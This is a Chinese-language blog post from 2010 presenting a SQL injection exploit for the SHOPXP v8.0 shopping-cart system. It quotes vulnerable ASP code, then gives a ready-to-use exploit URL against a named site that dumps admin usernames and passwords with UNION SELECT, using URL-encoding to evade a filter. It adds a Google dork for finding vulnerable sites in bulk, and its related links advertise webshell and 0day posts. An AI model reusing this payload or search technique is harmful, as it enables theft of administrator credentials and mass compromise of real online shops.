SHOPXP网上购物系统 v8.0 注入漏洞利用

2010, February 6, 1:54 PM. 漏洞分析
Submitted by admin

上次说了SHOPXP网上购物系统 7.4的注入漏洞   跟新了,看看8.0的

商城系统差不多都是互相抄的。漏洞和网趣的那个一样,不过人家加了一个枫叶的防注入,没什么用处。

在TEXTBOX2.ASP TEXTBOX3.ASP页面的newsid变量为判断
复制代码 Action=LCase(Request.QueryString("Action")) 
newsID=Request.QueryString("newsID") 

If request("action")="modify" Then 
set rs=server.createobject("adodb.recordset") 
sql="select * from shopxp_news where newsid="&newsid 
rs.open sql,conn,1,1 
     If Not rs.Eof Then 
         Content=rs("newscontent") 
     End If 
     Response.Write Content 
End If 
 


构造URL注入即可。

exp:
http://www.gn918.cn/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

批量
google:inurl:shopxp_news.asp

Tags: shopxp

« 上一篇 | 下一篇 »

只显示10条记录相关文章
shopxp html版2.0直接添加管理员漏洞 (浏览: 9069, 评论: 0)
shopxp pinglun.asp 注入漏洞 (浏览: 9056, 评论: 0)
ShopXp CMS上传拿Webshell (浏览: 9023, 评论: 0)
SHOPXP网上购物系统 v8.0 (浏览: 11418, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 9836, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):